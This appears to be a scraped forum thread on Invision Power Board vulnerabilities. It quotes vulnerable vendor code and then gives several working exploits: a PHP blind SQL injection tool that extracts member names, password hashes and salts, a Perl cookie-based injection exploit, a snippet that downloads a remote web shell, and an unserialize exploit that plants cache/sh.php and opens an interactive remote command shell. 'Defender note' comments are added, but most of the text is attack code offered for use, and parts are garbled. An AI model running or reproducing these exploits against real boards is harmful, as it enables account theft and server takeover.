-------------------------------------------------------------
// Excerpt of the search handler as quoted in the post; "..." marks lines the poster left out.
public function searchResults()
{
/* Search Term */
// Security note: the request value is run through urldecode() again here. If the framework's
// input cleaning has already happened by this point (not visible in this excerpt), a
// double-encoded quote such as %2527 only turns into a literal quote after that cleaning.
// NOTE(review): the first argument of each str_replace() below looks like an HTML entity that
// was decoded when the page was extracted (presumably "&quot;" and "&amp;") - confirm against
// the vendor source before relying on these two lines.
$search_term = str_replace( """, '"', urldecode( $this->request['search_term'] ) );
$search_term = str_replace( "&", '&', $search_term );
...
/* Count the number of results */
// The decoded term is handed to the search plugin's getSearchCount().
// Mitigation: drop the extra urldecode() and escape or parameterise the term where the SQL
// is assembled.
$total_results = $this->search_plugin->getSearchCount( $search_term, ', $content_titles_only );
-------------------------------------------------------------
forum/index.php?app=core&module=search&do=quick_search&search_filter_app[forums]=
-------------------------------------------------------------
// Excerpt of the search plugin's count query as quoted in the post; "..." marks elided lines.
public function getSearchCount( $search_term, $group_by='', $content_title_only=false ) {
...
{
/* Query the count */
// The WHERE clause comes from _buildWhereStatement(), which receives the caller's search term.
// That helper is not shown here, so whether it escapes the term cannot be confirmed from this
// excerpt - verify against the vendor source.
$this->DB->build( array(
'select' => 'COUNT(*) as total_results',
'from' => array( 'posts' => 'p' ),
'where' => $this->_buildWhereStatement( $search_term,
$content_title_only ),
'group' => $group_by,
'add_join' => array(
...
$this->DB->execute();
-------------------------------------------------------------
From "admin/applications/core/modules_public/global/lostpass.php" line ~430
-------------------------------------------------------------
// Excerpt of the lost-password validation handler as quoted in the post; "..." marks elided lines.
public function lostPasswordValidateForm( $msg='' ) {
...
if( $this->request['uid'] AND $this->request['aid'] )
{
// uid is forced to an integer by intval(), so it is safe to interpolate later on.
$in_user_id = intval( trim( urldecode( $this->request['uid'] ) ) );
// Security note: aid is only trimmed and URL-decoded a second time; it stays an arbitrary string.
$in_validate_key = trim( urldecode( $this->request['aid'] ) );
$in_type = trim( $this->request['type'] );

...
// Security note: md5Clean() returns a cleaned copy. Here the copy is only tested for
// truthiness and then discarded, so $in_validate_key keeps its original, uncleaned value.
if (! IPSText::md5Clean( $in_validate_key ) )
{
$this->registry->output->showError( 'validation_key_incorrect', 10113 );
}

// Always passes for the integer produced by intval() above (presumably non-negative - TODO confirm).
if (! preg_match( "/^(?:\d){1,}$/", $in_user_id ) )
{
$this->registry->output->showError( 'uid_key_incorrect', 10114 );
}

/* Attempt to get the profile of the requesting user */
$member = IPSMember::load( $in_user_id );

if( ! $member['member_id'] )
{
$this->registry->output->showError( 'lostpass_no_member', 10115 );
}

/* Get validating info.. */
// Security note: the uncleaned $in_validate_key is placed between quotes in the WHERE string.
// Mitigation: assign the result of md5Clean() back to the variable and reject anything that is
// not exactly 32 characters of the expected alphabet, or pass the value through the DB
// layer's escaping before it is interpolated.
$validate = $this->DB->buildAndFetch( array( 'select' => '*', 'from' => 'validating',
'where' => "member_id={$in_user_id} and vid='{$in_validate_key}'
and lost_pass=1" ) );
-------------------------------------------------------------
-------------------------------------------------------------
/**
 * Returns the first 32 bytes of $text with every character outside [a-zA-Z0-9] removed.
 *
 * The argument itself is not modified and nothing is validated: the result is simply the
 * cleaned copy, which is truthy for almost any input. Callers that need a safe key must use
 * the returned string (and check its length), not the variable they passed in.
 *
 * @param string $text Candidate MD5-style key.
 * @return string Cleaned copy, at most 32 characters long.
 */
static public function md5Clean( $text ) {
return preg_replace( "/[^a-zA-Z0-9]/", "" , substr( $text, 0, 32 ) ); }
-------------------------------------------------------------





Attention!\n";
echo "\n";
echo "\n";
echo "This exploit is meant to be used as php CLI script!\n";
echo "More information:\n";
echo "http://www.google.com/search?hl=en&q=php+cli+windows\n";
echo "This script will not run through a webserver.\n";
echo "\n";
exit;
}
// Driver section of the posted proof-of-concept: it parses the CLI arguments, probes the board,
// and then reads either a user name (option 1) or a password hash and salt (option 2) for one
// member id through the functions defined further down. Kept verbatim for reference.
//=====================================================================
// Print the awesome de.crypt.in logo
//=====================================================================
echo "\n _ _ _ ";
echo "\n __| | ___ ___ _ __ _ _ _ __ | |_ (_)_ __ ";
echo "\n / _` |/ _ \ / __| '__| | | | '_ \| __| | | '_ \ ";
echo "\n| (_| | __/| (__| | | |_| | |_) | |_ _| | | | |";
echo "\n \__,_|\___(_)___|_| \__, | .__/ \__(_)_|_| |_|";
echo "\n |___/|_| \n\n";
//=====================================================================
// Check if all command line arguments were passed
//=====================================================================
if(!isset($argv[1])||!isset($argv[2])||!isset($argv[3])){
echo "Usage: php ".$_SERVER['PHP_SELF']." [login] [password]\n";
echo "\n";
echo "NOTE: Login and password are optional, use for forums that require registration.\n";
echo "Options: 1 - Fetch username, 2 - Fetch password hash\n\n";
echo "Example: php ".$_SERVER['PHP_SELF']." http://ipb.com/board/ 1 1 foo bar\n";
die;
}
//=====================================================================
// Set some important variables...
//=====================================================================
// argv[1] = board URL, argv[2] = member id, argv[3] = option, argv[4]/argv[5] = optional login.
$topicname = '';
$url = $argv[1];
$chosen_id = $argv[2];
$ch_option = $argv[3];
if(isset($argv[4])){
if(isset($argv[5])){
$user_login = $argv[4];
$user_pass = $argv[5];
}
else{
echo "Error: Password not specified with username\n";
die;
}
}
# Proxy settings
# Be sure to use proxy
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipb_log.txt'; //Log file

// Only the Windows DLL name is tried when the curl extension is missing.
if(!extension_loaded('curl'))
{
if(!dl('php_curl.dll'))
{
die("Curl extension not loaded!\n Fatal exit ...\n");
}
else
{
echo "Curl loading success\n";
}
}
//=====================================================================
xecho("Target: $url\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("==========================================");
add_line("Target: $url");
if(isset($argv[4])){
login_to_forum($argv[4], $argv[5]);
}
$i = $chosen_id;
echo "Fetching topics from ID $i\n";
// A topic title is needed for the later search requests; it is asked for interactively
// when none can be found for the member id.
if(!fetch_target_id($i))
{
echo "No topics found.\n";
fwrite(STDOUT, "Last ditch effort, enter topic: ");
$topicname = trim(fgets(STDIN));
}
else echo "Topic found! Hacktime.\n";

// Check chosen option and proceed accordingly
// Defender note: option 2 writes "id:hash:salt" to the log file. A board whose logs show this
// traffic should treat the affected member's password hash and salt as disclosed (reset the
// password, invalidate sessions) in addition to patching.
add_line("------------------------------------------");
if($ch_option == 2){
$hash = get_hash($i);
$salt = get_salt($i);
$line = "$i:$hash:$salt";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
}
else if($ch_option == 1){
$uname = get_user($i);
$line = "The username for id $i is $uname";
add_line($line);
xecho("$uname");
}
xecho("\nQuestions and feedback - http://de.crypt.in/ \n");
die(" \n");
//////////////////////////////////////////////////////////////////////
// Posts a login form to the board (URL taken from the global $url) and stops the script unless
// the response contains the success message. $user and $pass are concatenated into the POST
// body as given, without URL-encoding.
function login_to_forum($user, $pass)
{
global $url;
$post = 'app=core&module=global§ion=login&do=process&username='.$user.'&password='.$pass.'&rememberMe=1';
$buff = trim(make_post($url, $post, '', $url));
// Success is decided purely by a substring match on the returned page.
if(strpos($buff,'The login was successful!')>0){
xecho("Logged in.\n");
}
else{
xecho("Error: Unable to login.");
die;
}
}
//////////////////////////////////////////////////////////////////////
// Sends one probe search to the board at the global $url and aborts the script when the
// response indicates a redirect or a normal "no results" page.
// Defender note: the probe's search_term ends in %2527 (a double-encoded quote). A quick_search
// POST carrying %2527 in search_term is a strong log indicator, and - by this script's own
// logic - a board that simply answers "No results found for" is treated as not vulnerable.
function test_target_url()
{
global $url;

$post = 'app=core&module=search§ion=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%5Ball%5D=1&content_title_only=1&search_term=test%2527';
$buff = trim(make_post($url, $post, '', $url));

if(strpos($buff,'Moved Permanently')>0)
{
die('Ivalid. Try adding trailing slash to url. Exiting ...');
}

if(strpos($buff,'No results found for')>0)
{
die('Target is patched? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
// Requests the "user_posts" search view for member $id and, when the page contains
// "View result", stores the text that follows the next ">" in the global $topicname.
// Returns true when such a result was found, false otherwise.
function fetch_target_id($id)
{
global $url, $topicname;
$post = 'app=core&module=search&do=user_posts&mid='.$id.'&view_by_title=1&search_filter_app%5Bforums%5D=1';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'View result')>0){
$location = strpos($buff,'View result');
$start = strpos($buff,'>',$location)+1;
$end = strpos($buff,'',$start);
$topicname = substr($buff,$start,($end-$start));
return true;
}
else return false;
}
///////////////////////////////////////////////////////////////////////
// Assembles a 5-character string for member $id by calling get_saltchar() once per position
// (1..5), printing progress after every character. Returns the assembled string.
function get_salt($id)
{
$len = 5;
$out = '';
xecho("Finding salt ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_saltchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}
xecho("\nFinal salt for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
// Determines one character (position $pos) of members_pass_salt for member $id by bisecting
// the code range 32..128: each step asks test_condition() whether the character code is
// greater than the midpoint. Returns the character as a one-byte string.
// Defender note: every step is a separate search request whose body contains
// "ORD(SUBSTR(m.members_pass_salt" - a distinctive string to alert on in request logs or WAF rules.
function get_saltchar($pos, $id)
{
global $prefix; // declared but not used in this function
$char = '';
$min = 32;
$max = 128;
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_salt,'.$pos.',1))';
$curr = 0;
while(1)
{
$area = $max - $min;
// Range narrowed to two candidates: one equality test decides between them.
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;
// %253e is ">" URL-encoded twice.
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
// Assembles a 32-character string for member $id by calling get_hashchar() once per position
// (1..32), printing progress after every character. Returns the assembled string.
function get_hash($id)
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
// Determines one character (position $pos) of members_pass_hash for member $id. A first
// request decides whether the character code is above 57 (letter range 97..102) or not
// (digit range 48..57); the chosen range is then bisected through test_condition().
// Returns the character as a one-byte string.
// Defender note: each character costs several search requests containing
// "ORD(SUBSTR(m.members_pass_hash"; a burst of such requests from one client is the signature
// to look for, and rate limiting on the search endpoint slows it down considerably.
function get_hashchar($pos, $id)
{
global $prefix; // declared but not used in this function
$char = '';
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_hash,'.$pos.',1))';
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
// Range narrowed to two candidates: one equality test decides between them.
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;
// %253e is ">" URL-encoded twice.
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Assembles a 32-character string for member $id by calling get_userchar() once per position
// (1..32), printing progress after every character. The length is fixed at 32 regardless of
// how long the stored name is. Returns the assembled string.
function get_user($id)
{
$len = 32;
$out = '';

xecho("Finding username ...\n");

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_userchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current username: $out \n");
}

xecho("\nFinal username for ID $id: $out\n\n");

return $out;
}
///////////////////////////////////////////////////////////////////////
// Determines one character (position $pos) of the member's name column for member $id. A first
// request decides whether the character code is above 57 (range 65..122) or not (digit range
// 48..57); the chosen range is then bisected through test_condition().
// Returns the character as a one-byte string.
// Defender note: the request bodies contain "ORD(SUBSTR(m.name" - usable as a log/WAF indicator.
function get_userchar($pos, $id)
{
global $prefix; // declared but not used in this function

$char = '';
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.name,'.$pos.',1))';

// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);

if($letter)
{
$min = 65;
$max = 122;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}

$curr = 0;

while(1)
{
$area = $max - $min;
// Range narrowed to two candidates: one equality test decides between them.
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

// %253e is ">" URL-encoded twice.
$post = $pattern . '%253e' . $curr;

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

xecho("Current test: $curr-$max-$min\n");
}

return $char;
}
///////////////////////////////////////////////////////////////////////
// Sends one search request with the condition $p embedded in the search term and maps the
// board's answer to a boolean: true when the page contains "Your search for the term ", false
// when it contains "No results found for". A page containing "Driver Error" ends the script;
// any other page is retried after a pause, up to $maxtry attempts.
// Defender note: indicators visible in the request body are the double-encoded quote %2527,
// the literal "IN BOOLEAN MODE)" and "MATCH(t.title) AGAINST(" inside search_term. The
// "Driver Error" branch shows that database errors were displayed to clients; suppressing
// verbose SQL errors and patching the search handler are the relevant mitigations.
function test_condition($p)
{
global $url;
global $topicname;

$bret = false;
$maxtry = 10;
$try = 1;

// "%%" is a literal percent sign for sprintf(); "%s" receives the condition.
$pattern = 'app=core&module=search§ion=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%%5Ball%%5D=1&content_title_only=1&search_term='.$topicname.'%%2527 IN BOOLEAN MODE) AND %s AND MATCH(t.title) AGAINST(%%2527'.$topicname;
$post = sprintf($pattern, $p);

while(1)
{
$buff = trim(make_post($url, $post, '', $url));

if(strpos($buff,'Your search for the term ')>0)
{
$bret = true;
break;
}
elseif(strpos($buff,'No results found for')>0)
{
break;
}
elseif(strpos($buff, 'Driver Error') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
xecho("Will wait 30 seconds for flood control. Expect 2-3 tries.\n");
xecho("This is going to take years...\n");
// The pause is 10 seconds, although the message above says 30.
sleep(10);
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
/**
 * Sends a single HTTP POST with cURL and returns whatever curl_exec() yields
 * (the response text, or false when the transfer fails).
 *
 * Cookies are read from and written to "cookies.txt" in the working directory. A proxy is used
 * when $GLOBALS['proxy_ip_port'] is non-empty, with optional credentials taken from
 * $GLOBALS['proxy_user_password'].
 *
 * Defender note: the User-Agent sent here is a fixed MSIE 6.0 string with no closing
 * parenthesis, which makes traffic from this script easy to spot in access logs.
 *
 * @param string $url         Address to post to.
 * @param string $post_fields Raw request body.
 * @param string $cookie      Optional Cookie header value.
 * @param string $referer     Optional Referer header value.
 * @param bool   $headers     When exactly TRUE, response headers are included in the result.
 */
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
    $connectTimeout = 120;
    $handle = curl_init();

    curl_setopt($handle, CURLOPT_URL, $url);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, $connectTimeout);
    curl_setopt($handle, CURLOPT_POST, 1);
    curl_setopt($handle, CURLOPT_POSTFIELDS, $post_fields);
    curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ');
    curl_setopt($handle, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($handle, CURLOPT_COOKIEFILE, 'cookies.txt');

    // Optional proxy; credentials only matter when a proxy address is configured.
    if (!empty($GLOBALS['proxy_ip_port'])) {
        curl_setopt($handle, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
        if (!empty($GLOBALS['proxy_user_password'])) {
            curl_setopt($handle, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
        }
    }

    if (!empty($cookie)) {
        curl_setopt($handle, CURLOPT_COOKIE, $cookie);
    }

    if (!empty($referer)) {
        curl_setopt($handle, CURLOPT_REFERER, $referer);
    }

    // Only a strict TRUE switches header output on.
    curl_setopt($handle, CURLOPT_HEADER, $headers === TRUE);

    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
///////////////////////////////////////////////////////////////////////
/**
 * Appends $line, terminated by CRLF, to the file named by the global $outfile.
 *
 * @param string $line Text to append (without line ending).
 */
function add_line($line)
{
    global $outfile;

    // Binary append mode so the CRLF is written exactly as given.
    $handle = fopen($outfile, 'ab');
    fwrite($handle, $line . "\r\n");
    fclose($handle);
}
///////////////////////////////////////////////////////////////////////
/**
 * Prints $line. When $GLOBALS['cli'] is truthy the text is printed as-is; otherwise it is
 * HTML-escaped and newlines are given <br /> tags first.
 *
 * @param string $line Text to print.
 */
function xecho($line)
{
    $text = $GLOBALS['cli'] ? $line : nl2br(htmlspecialchars($line));
    echo "$text";
}
///////////////////////////////////////////////////////////////////////
?>​

Last edited by a moderator: 12 Nov 2010







#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Driver of the posted script: reads server, path, member id and target selector from the
# command line, then repeatedly calls found() for one character position ($s_num) at a time
# until it reports 0, and prints the collected result. Kept verbatim for reference.
use  IO :: Socket ;
if (@ ARGV  <  4 ) { & usage ; }
$server  =  $ARGV [ 0 ];
$path  =  $ARGV [ 1 ];
$member_id  =  $ARGV [ 2 ];
$target  =  $ARGV [ 3 ];
# Column to read: member_login_key for a non-zero target, password for target 0.
$pass  = ( $target )?( 'member_login_key' ):( 'password' );
$server  =~  s !( http :\/\/)!!;
$request  =  'http://' ;
$request  .=  $server ;
$request  .=  $path ;
$s_num  =  1 ;
$|++;
$n  =  0 ;
print  "[~] SERVER :  $server \r\n" ;
print  "[~] PATH :  $path \r\n" ;
print  "[~] MEMBER ID :  $member_id \r\n" ;
print  "[~] TARGET :  $target " ;
print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' ));
print  "\r\n" ;
print  "[~] SEARCHING PASSWORD ... [|]" ;
# Percent-encodes every character of the member id for use inside the Cookie header.
( $cmember_id  =  $member_id ) =~  s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;
while( 1 )
{
# Digits range first, then the lower-case letter range.
if(& found ( 47 , 58 )== 0 ) { & found ( 96 , 122 ); }
$char  =  $i ;
if ( $char == "0" )
{
if( length ( $allchar ) >  0 ){
print  qq {\ b \ b DONE  ]
MEMBER ID  :  $member_id
};
print (( $target )?( 'MEMBER_LOGIN_KEY : ' ):( 'PASSWORD : ' ));
print  $allchar . "\r\n" ;
}
else
{
print  "\b\b FAILED ]" ;
}
exit();
}
else
{
$allchar  .=  chr ( 42 );
}
$s_num ++;
}
# Recursively halves the code range [$fmin, $fmax] using a "BETWEEN ... AND ..." condition sent
# through check(); once the range is narrower than 5 it hands over to crack() and stores the
# result in the global $i.
sub found ($$)
{
my $fmin  =  $_ [ 0 ];
my $fmax  =  $_ [ 1 ];
if (( $fmax - $fmin )< 5 ) {  $i = crack ( $fmin , $fmax ); return  $i ; }
$r  =  int ( $fmax  - ( $fmax - $fmin )/ 2 );
$check  =  " BETWEEN  $r  AND  $fmax " ;
if ( & check ( $check ) ) { & found ( $r , $fmax ); }
else { & found ( $fmin , $r ); }
}
# Tries each code from $cmin up to (but not including) $cmax with an equality condition sent
# through check(). Returns the first code that matches, or 0 when none does. Uses the global $i
# as its counter.
sub crack ($$)
{
my $cmin  =  $_ [ 0 ];
my $cmax  =  $_ [ 1 ];
$i  =  $cmin ;
while ( $i < $cmax )
{
$crcheck  =  "= $i " ;
if ( & check ( $crcheck ) ) { return  $i ; }
$i ++;
}
$i  =  0 ;
return  $i ;
}
# Sends one HTTP/1.0 GET to index.php?act=Login&CODE=autologin with a crafted Cookie header
# (member_id and pass_hash) and returns 1 when the response contains
# "Set-Cookie: session_id=0;", 0 otherwise. The condition passed in $_[0] is embedded in the
# pass_hash cookie value.
# Defender note: the pass_hash cookie sent here is fully percent-encoded, contains %2527 and is
# far longer than a 32-character hash. Rejecting pass_hash values that are not exactly 32 hex
# characters before they reach any SQL, and alerting on autologin requests with such cookies,
# addresses this request pattern; the script header names 3.1.4 as the fixed 3.x release.
sub check ($)
{
$n ++;
status ();
$ccheck  =  $_ [ 0 ];
$pass_hash1  =  "%36%36%36%2527%20%4F%52%20%28%69%64%3D" ;
$pass_hash2  =  "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28" ;
$pass_hash3  =  $pass . "," . $s_num . ",1))" . $ccheck . ") /*" ;
$pass_hash3  =~  s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;
$nmalykh  =  "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20" ;
# A new TCP connection to port 80 is opened for every single check.
$socket  =  IO :: Socket :: INET -> new (  Proto  =>  "tcp" ,  PeerAddr  =>  " $server " ,  PeerPort  =>  "80" );
printf $socket  ( "GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n" ,
$path , $server , $cmember_id , $pass_hash1 , $cmember_id , $pass_hash2 , $pass_hash3 , $nmalykh );
while(< $socket >)
{
if (/ Set - Cookie :  session_id = 0 ;/) { return  1 ; }
}
return  0 ;
}
# Console spinner: overwrites the last two characters with the next frame, chosen from the
# global request counter $n modulo 5 (nothing is printed when the remainder is 4).
sub status ()
{
$status  =  $n  %  5 ;
if( $status == 0 ){ print  "\b\b/]" ; }
if( $status == 1 ){ print  "\b\b-]" ; }
if( $status == 2 ){ print  "\b\b\\]" ; }
if( $status == 3 ){ print  "\b\b|]" ; }
}
sub usage ()
{
print  q (
Invision Power Board v  <  3.1.4 SQL injection exploit
----------------------------------------------------
USAGE :
~~~~~~
r57ipb3 . pl  [ server ] [/ folder /] [ member_id ] [ target ]
[ server ] -  host where IPB installed
[/ folder /] -  folder where IPB installed
[ member_id ] -  user id  for  brute
targets :
0  -  IPB 1. *
1  -  IPB 2. *
2  -  IPB 3. * ( Prior To 3.1.4 )
e . g .  r57ipb3 . pl 127.0.0.1  / IPB /  1 1
----------------------------------------------------
( c ) oded by 1dt . w0lf
RST / GHC  ,  http : //rst.void.ru , http://ghc.ru
);
exit();








;url=javascript:alert('Fuck off');" HTTP-EQUIV="refresh





Какие таблицы в БД могут быть у Ipb?






// Defender note: this snippet fetches a remote file and writes it out as shell.php in a
// writable directory. Relevant mitigations: disable allow_url_fopen where it is not needed,
// deny PHP execution in writable/upload directories, and alert on new .php files appearing there.
$a  =  file_get_contents ( http : //site/shell.txt); //address of your shell
$b  = '/path/to/writeable/dir/' ;  //directory that is writable
$c  =  fopen ( $br . 'shell.php' ,  "w" ); 
fwrite ( $c ,  $a ); 
fclose ( $c );








// Defender note: this snippet fetches a remote file and writes it out as shell.php in a
// writable directory. Relevant mitigations: disable allow_url_fopen where it is not needed,
// deny PHP execution in writable/upload directories, and alert on new .php files appearing there.
$a  =  file_get_contents ( http : //site/shell.txt); //address of your shell
$b  = '/path/to/writeable/dir/' ;  //directory that is writable
$c  =  fopen ( $br . 'shell.php' ,  "w" ); 
fwrite ( $c ,  $a ); 
fclose ( $c );





 \n" ;
    print  "\nExample....: php  $argv [ 0 ]  localhost /" ;
    print  "\nExample....: php  $argv [ 0 ]  localhost /ipb/\n" ;
    die();
}
 
// Positional CLI arguments: host name and base path of the board.
list( $host ,  $path ) = array( $argv [ 1 ],  $argv [ 2 ]);
 
// First request: fetch index.php and take whatever sits between "Cookie: " and "session" in
// the response as the board's cookie prefix (empty string when nothing matches).
// http_send() is defined outside this excerpt.
$packet   =  "GET  { $path } index.php HTTP/1.0\r\n" ;
$packet  .=  "Host:  { $host } \r\n" ;
$packet  .=  "Connection: close\r\n\r\n" ;
     
$_prefix  =  preg_match ( '/Cookie: (.+)session/' ,  http_send ( $host ,  $packet ),  $m ) ?   $m [ 1 ] :  '' ;
 
// Local stand-in carrying the class name and "obj" property layout that the serialized string
// further down refers to: debug logging switched on and the log path set to cache/sh.php.
class  db_driver_mysql
{
    public  $obj  = array( 'use_debug_log'  =>  1 ,  'debug_log'  =>  'cache/sh.php' );
}
# Super bypass by @i0n1c
// The member_id cookie is set to a serialized PHP array holding a db_driver_mysql object; the
// object's length field is written as "+15".
// Defender note: a member_id cookie that starts with "a:1:{" / contains "O:" instead of a
// plain number (presumably the normal form - confirm) is the indicator for this request.
// Follow-on indicators are requests for cache/sh.php and a "Cmd:" request header.
// Mitigations: upgrade past the affected release named in the thread (<= 3.3.4), never pass
// cookie data to unserialize() (use a data-only format such as JSON), and keep the cache/
// directory from executing PHP.
$payload  =  urlencode ( 'a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}' );
$phpcode  =  '' ;
 
$packet   =  "GET  { $path } index.php? { $phpcode }  HTTP/1.0\r\n" ;
$packet  .=  "Host:  { $host } \r\n" ;
$packet  .=  "Cookie:  { $_prefix } member_id= { $payload } \r\n" ;
$packet  .=  "Connection: close\r\n\r\n" ;
 
http_send ( $host ,  $packet );
 
// Template for the follow-up requests; "%s" in the Cmd header is filled in by sprintf() below.
$packet   =  "GET  { $path } cache/sh.php HTTP/1.0\r\n" ;
$packet  .=  "Host:  { $host } \r\n" ;
$packet  .=  "Cmd: %s\r\n" ;
$packet  .=  "Connection: close\r\n\r\n" ;
 
if ( preg_match ( '/<\?error/' ,  http_send ( $host ,  $packet ))) die( "\n[-] short_open_tag disabled!\n" );
 
// Interactive loop: each line read from STDIN is base64-encoded into the Cmd header and the
// part of the response after "___" is printed; "exit" ends the loop.
while( 1 )
{
    print  "\nipb-shell# " ;
    if (( $cmd  =  trim ( fgets ( STDIN ))) ==  "exit" ) break;
     $response  =  http_send ( $host ,  sprintf ( $packet ,  base64_encode ( $cmd )));
     preg_match ( '/___(.*)/s' ,  $response ,  $m ) ? print  $m [ 1 ] : die( "\n[-] Exploit failed!\n" );
}
?>








Invision Power Board <= 3.3.4 unserialize Regex Bypass
